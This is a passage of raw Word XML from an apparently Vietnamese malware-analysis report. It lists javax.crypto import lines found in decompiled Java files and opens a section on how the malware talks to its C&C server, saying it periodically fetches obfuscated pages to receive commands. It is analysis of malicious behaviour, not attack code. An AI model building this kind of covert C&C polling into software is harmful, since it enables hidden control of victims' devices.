        <w:t>DESKeySpec</w:t>
      </w:r>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371A691E"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e/a.java:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>4:import</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> javax.crypto.</w:t>
      </w:r>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Cipher</w:t>
      </w:r>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3F6397"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e/a.java:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>5:import</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> javax.crypto.NoSuchPaddingException;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DC5A78"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e/a.java:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>6:import</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> javax.crypto.</w:t>
      </w:r>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SecretKeyFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3587736E"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g/a.java:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>9:import</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> javax.crypto.Cipher;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28640187"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g/a.java:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>10:import</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> javax.crypto.</w:t>
      </w:r>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SecretKey</w:t>
      </w:r>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9B6539" w14:textId="77777777" w:rsidR="0070676B" w:rsidRPr="0070676B" w:rsidRDefault="0070676B" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>./g/a.java:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>11:import</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0070676B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> javax.crypto.SecretKeyFactory;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CFA685" w14:textId="6BF9CF31" w:rsidR="0070676B" w:rsidRDefault="0070676B" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="698E81B6" w14:textId="1B130726" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44060316" w14:textId="35B14B5E" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DA52FF6" w14:textId="752DCFE6" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="798D9B2B" w14:textId="4886C11F" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74ABAFE1" w14:textId="798740F9" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54D48292" w14:textId="77A20D74" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EEB02FE" w14:textId="38DE9AD2" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EE64E3E" w14:textId="74548633" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69AD3F05" w14:textId="3657A39E" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B2CC774" w14:textId="5FEC8BEC" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10C0D453" w14:textId="509E23BB" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DCDA3E2" w14:textId="351504F8" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="026C7F34" w14:textId="1758B0F4" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="408949EC" w14:textId="6DE5C5F0" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22E774E9" w14:textId="247CD7B4" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="646BCBB0" w14:textId="1671FABA" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DAC789B" w14:textId="4C9B8D47" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0687B4C3" w14:textId="1F2E59C2" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="503634CD" w14:textId="4A9487B2" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F268EBB" w14:textId="453E7852" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="089ABA35" w14:textId="32E6439E" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46BCDF5C" w14:textId="2AA383E5" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E07BCA2" w14:textId="69DC87E3" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C560507" w14:textId="1B0BB729" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B7E5CAA" w14:textId="29B5A526" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="388D6FE8" w14:textId="250AED9A" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F49EA03" w14:textId="41A3505A" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="314E6FAD" w14:textId="291F17AA" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28DBAA1A" w14:textId="0E197D04" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02DDC691" w14:textId="1117606D" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48DAEE78" w14:textId="77777777" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46D54821" w14:textId="7F3CEDD4" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F7CE808" w14:textId="77777777" w:rsidR="002F05F7" w:rsidRPr="0070676B" w:rsidRDefault="002F05F7" w:rsidP="0070676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E6EF8B2" w14:textId="731B2C00" w:rsidR="002F62FD" w:rsidRDefault="002F62FD" w:rsidP="002F62FD"/>
    <w:p w14:paraId="7473FD19" w14:textId="77777777" w:rsidR="002F05F7" w:rsidRPr="002F62FD" w:rsidRDefault="002F05F7" w:rsidP="002F62FD"/>
    <w:p w14:paraId="4AB3E5F6" w14:textId="018D6BAA" w:rsidR="00A51B16" w:rsidRDefault="00A51B16">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc533387047"/>
      <w:r w:rsidRPr="00510570">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidR="00510570" w:rsidRPr="00510570">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mô hình truyền thông giữa phần mềm độc hại và máy chủ C&amp;C.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="29680A36" w14:textId="175C8EF7" w:rsidR="00510570" w:rsidRDefault="00510570" w:rsidP="00510570"/>
    <w:p w14:paraId="662DAEC6" w14:textId="4394E0CF" w:rsidR="00CA0D70" w:rsidRPr="00CA0D70" w:rsidRDefault="00CA0D70" w:rsidP="00CA0D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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA0D70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Phần mềm độc hại định kỳ tìm nạp các trang web trên máy chủ C &amp; C để lang nghe tu phia may chu. Tuy nhiên, những thông tin liên lạc này bị che khuất bằng cách nào đó:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0196BCD2" w14:textId="77777777" w:rsidR="00CA0D70" w:rsidRPr="00CA0D70" w:rsidRDefault="00CA0D70" w:rsidP="00CA0D70">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA0D70">
        <w:rPr>
